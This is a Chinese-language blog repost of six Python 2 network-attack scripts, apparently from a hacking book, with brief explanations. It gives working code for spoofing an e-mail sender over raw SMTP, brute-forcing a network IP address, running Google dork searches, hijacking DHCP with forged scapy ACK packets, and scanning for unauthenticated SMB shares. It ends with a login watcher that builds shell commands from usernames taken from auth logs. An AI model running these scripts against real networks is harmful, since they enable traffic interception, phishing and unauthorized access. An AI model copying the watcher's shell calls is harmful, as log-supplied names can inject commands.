[Python] Bargain Box Kung Fu
2015-12-03 16:35
846 查看
1.Spoofing E-mail Sender
这个代码需要用户在本地自建一个SMTP服务器,并且不认证用户。
源码为:
2.IP Brute Forcer
当成功连接到一个网络,但却缺少一个IP地址,DHCP不给你分配,也无法得到IP架构,这种情况下攻击者会尝试着通过暴力猜解的方式得到一个IP。
此程序先配置网卡,然后在ping某个网段的网关,假设回复中含有bytes from,那么就说明我们可以得到一个合法的IP地址
源码为:
程序执行为:
3. Google-Hacks-Scanner
会用到google模块,先将要搜索的词保存在一个文件中,本例中为dic.txt,然后google.research()函数会利用谷歌进行搜索,之后通过re的正则表达式跳出谷歌搜索出的URL中带有“twitter”关键字的URL,并打印出来。
还有一点需要注意,如果搜索的过快地话,查询会被谷歌阻断。
源码:
4.DHCP Hijack
通过sniff函数捕获所有端口号为67的UDP包,随后检查该包是否是DHCP-Request,如果是,则构建一个假的DHCP-ACK包。
源码:
捕获的数据包:
5.SMB-Share-Scanner
此代码是一个用于查找开放的SMB共享的简单扫描器。
首先利用函数get_ips()来计算IP范围,之后随即迭代所有的IP地址,并且调用外部命令smbclient,此命令尝试列出所有未经认证的SMB共享。
源码:
6.Login Watcher
源码:
这个代码需要用户在本地自建一个SMTP服务器,并且不认证用户。
源码为:
import socket
HOST = 'localhost'
PORT = 25
MAIL_TO = "someone@on_the_inter.net"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
sock.connect((HOST,PORT))
sock.send('HELO du.da')
sock.send('MAIL FROM: wweihnachtsmann@nordpol.net')
print repr(sock.recv(1024))
sock.send('RCPT TO:' + MAIL_TO)
print repr(sock.recv(1024))
sock.send('DATA')
sock.send('Subject: Dein Wunschzettel')
sock.send('Selbstverstaendlich bekommst Du Dein Pony!')
sock.send('Mfg der Weihnachtsmann')
sock.send('.')
print repr(sock.recv(1024))
sock.send('QUIT')
print repr(sock.recv(1024))
sock.close()2.IP Brute Forcer
当成功连接到一个网络,但却缺少一个IP地址,DHCP不给你分配,也无法得到IP架构,这种情况下攻击者会尝试着通过暴力猜解的方式得到一个IP。
此程序先配置网卡,然后在ping某个网段的网关,假设回复中含有bytes from,那么就说明我们可以得到一个合法的IP地址
源码为:
import os
import re
import sys
from random import randint
device = "wlan0"
ips = range(1,254)
def ping_ip(ip):
fh = os.popen("ping -c 1 -W 1 " + ip)
resp = fh.read()
if re.search("bytes from", resp, re.MULTILINE):
print "Got response from " + ip
sys.exit(1)
while len(ips) > 0:
host_byte = randint(2,253)
idx = randint(0, len(ips)-1)
ip = ips[idx]
del ips[idx]
print "Checking net 10.0." + str(ip) + ".0"
cmd = "ifconfig " + device + str(ip) + "." + str(host_byte) + "up"
os.system(cmd)
ping_ip("10.0." + str(ip) + ".1")
ping_ip("10.0." + str(ip) + ".254")程序执行为:
3. Google-Hacks-Scanner
会用到google模块,先将要搜索的词保存在一个文件中,本例中为dic.txt,然后google.research()函数会利用谷歌进行搜索,之后通过re的正则表达式跳出谷歌搜索出的URL中带有“twitter”关键字的URL,并打印出来。
还有一点需要注意,如果搜索的过快地话,查询会被谷歌阻断。
源码:
import re
import sys
import google
import urllib2
if len(sys.argv) < 2:
print sys.argv[0] + ": <dict>"
sys.exit(1)
fh = open(sys.argv[1])
for word in fh.readlines():
print "\nSearching for " + word.strip()
results = google.search(word.strip(),pause=5)
try:
for link in results:
if re.search("twitter", link): print link
except KeyError:
pass
except urllib2.HTTPError, e:
print "Google search failed: " + str(e)程序运行过程:4.DHCP Hijack
通过sniff函数捕获所有端口号为67的UDP包,随后检查该包是否是DHCP-Request,如果是,则构建一个假的DHCP-ACK包。
源码:
import sys
import getopt
import random
import scapy.all as scapy
dev = "eth0"
gateway = None
nameserver = None
dhcpserver = None
client_net = "192.168.1."
filter = "udp port 67"
def handle_packet(packet):
eth = packet.getlayer(scapy.Ether)
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
bootp = packet.getlayer(scapy.BOOTP)
dhcp = packet.getlayer(scapy.DHCP)
dhcp_message_type = None
if not dhcp:
return False
for opt in dhcp.options:
if opt[0] == "message-type":
dhcp_message_type = opt[1]
#dhcp request
if dhcp_message_type == 3:
client_ip = client_net + str(random.randint(2,254))
dhcp_ack = scapy.Ether(src=eth.dst, dst=eth.src) / scapy.IP(src=dhcpserver, dst=client_ip) / scapy.UDP(sport=udp.dport,dport=udp.sport) / scapy.BOOTP(op=2, chaddr=eth.dst, siaddr=gateway, yiaddr=client_ip, xid=bootp.xid) / scapy.DHCP(options=[('message-type',5),('requested_addr',client_ip),('subnet_mask','255.255.255.0'),('router',gateway),('name_server',nameserver),('end')])
print "Send spoofed DHCP ACK to %s" % ip.src
scapy.sendp(dhcp_ack, iface=dev)
def usage():
print sys.argv[0] + """
-d <dns_ip>
-g <gateway_ip>
-i <dev>
-s <dhcp_ip>"""
sys.exit(1)
try:
cmd_opts = "d:g:i:s:"
opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
usage()
for opt in opts:
if opt[0] == "-i":
dev = opt[1]
elif opt[0] == "-g":
gateway = opt[1]
elif opt[0] == "-d":
nameserver = opt[1]
elif opt[0] == "-s":
dhcpserver = opt[1]
else:
usage()
if not gateway:
gateway = scapy.get_if_addr(dev)
if not nameserver:
nameserver = gateway
if not dhcpserver:
dhcpserver = gateway
print "Hijacking DHCP requests on %s" % (dev)
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)程序运行过程:捕获的数据包:
5.SMB-Share-Scanner
此代码是一个用于查找开放的SMB共享的简单扫描器。
首先利用函数get_ips()来计算IP范围,之后随即迭代所有的IP地址,并且调用外部命令smbclient,此命令尝试列出所有未经认证的SMB共享。
源码:
import sys
import os
from random import randint
def get_ips(start_ip, stop_ip):
ips = []
tmp = []
for i in start_ip.split('.'):
tmp.append("%02X" % long(i))
start_dec = long(''.join(tmp), 16)
tmp = []
for i in stop_ip.split('.'):
tmp.append("%02X" % long(i))
stop_dec = long(''.join(tmp), 16)
while(start_dec < stop_dec+1):
bytes = []
bytes.append(str(int(start_dec / 16777216)))
rem = start_dec % 16777216
bytes.append(str(int(rem / 65536)))
rem = rem % 65536
bytes.append(str(int(rem / 256)))
rem = rem % 256
bytes.append(str(rem))
ips.append(".".join(bytes))
start_dec += 1
return ips
def smb_share_scan(ip):
os.system("smbclient -q -N -L" + ip)
if len(sys.argv) < 2:
print sys.argv[0] + ": <start_ip-stop_ip>"
sys.exit(1)
else:
if sys.argv[1].find('-') > 0:
start_ip, stop_ip = sys.argv[1].split("-")
ips = get_ips(start_ip, stop_ip)
while len(ips) > 0:
i = randint(0, len(ips)-1)
lookup_ip = str(ips[i])
del ips[i]
smb_share_scan(lookup_ip)
else:
smb_share_scan(sys.argv[1])程序运行过程:6.Login Watcher
源码:
import os
import re
import tailer
import random
logfile = "/var/log/auth.log"
max_failed = 3
max_failed_cmd = "/sbin/shutdown -h now"
failed_login = {}
success_patterns = [re.compile("Accepted password for (?P<user>.+?) from (?P<host>.+?) port"),re.compile("session opened for user (?P<user>.+?) by")]
failed_patterns = [re.compile("Failed password for (?P<user>.+?) from (?P<host>.+?) port"),re.compile("FAILED LOGIN (\(\d\)) on '(.+?)' FOR '(?P<user>.+?)'"),re.compile("authentication failure\;.+?user\=(?P<user>.+?)\s+.+?\s+user\=(.+)")]
shutdown_msgs = [
"Eat my shorts",
"Follow the white rabbit",
"System will explode in three seconds!",
"Go home and leave me alone.",
"Game... Over!"
]
def check_match(line, pattern, failed_login_check):
found = False
match = pattern.search(line)
if(match != None):
found = True
failed_login.setdefault(match.group('user'),0)
# Remote login failed
if(match.group('host') != None and failed_login_check):
os.system("echo 'Login for user " + match.group('user') + " from host " + match.group('host') + " failed!' | festival --tts")
failed_login[match.group('user')] += 1
# Remote login successful
elif(match.group('host') != None and not failed_login_check):
os.system("echo 'User " + match.group('user') + " logged in from host " + match.group('host') + "' | festival --tts")
failed_login[match.group('user')] = 0
# Local login successful
elif(match.group('user') != "CRON" and not failed_login_check):
os.system("echo 'User " + match.group('user') + "logged in' | festival --tts")
failed_login[match.group('user')] = 0
# Too many failed login?
if failed_login[match.group('user')] >= max_failed:
os.system("echo '" + random.choice(shutdown_msgs) + "' | festival --tts")
os.system(max_failed_cmd)
return found
for line in tailer.follow(open(logfile)):
found = False
for pattern in failed_patterns:
found = check_match(line, pattern, True)
if found: break
if not found:
for pattern in success_patterns:
found = check_match(line, pattern, False)
if found: break
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Python学习笔记
- [python基础]关于中文编码和解码那点事儿
- python之Tkinter控件学习
- python CGI 编程环境搭建
- python 模块之platform模块(基本了解)
- python从SUMO中获取车辆平均行驶时间
- 关于Python中的yield
- Windows下Python pip的安装
- python 模块之os.path模块
- Python-排序
- Python之美[从菜鸟到高手]--生成器之全景分析
- [python]函数
- LeetCode解题报告-- Count and Say
- python与BeautifulSouop计算SUMO仿真的到达速率
- 【python】FTP客户端
- python一个进程——多线程threading的实现
- python调用API
- python 怎么模拟加header(如User-Agent、Content-Type等等)
- python入门--切片,迭代,列表生成
- python学习之路之案例0(实现登录功能,登录错误次数超过3次,自动退出登录)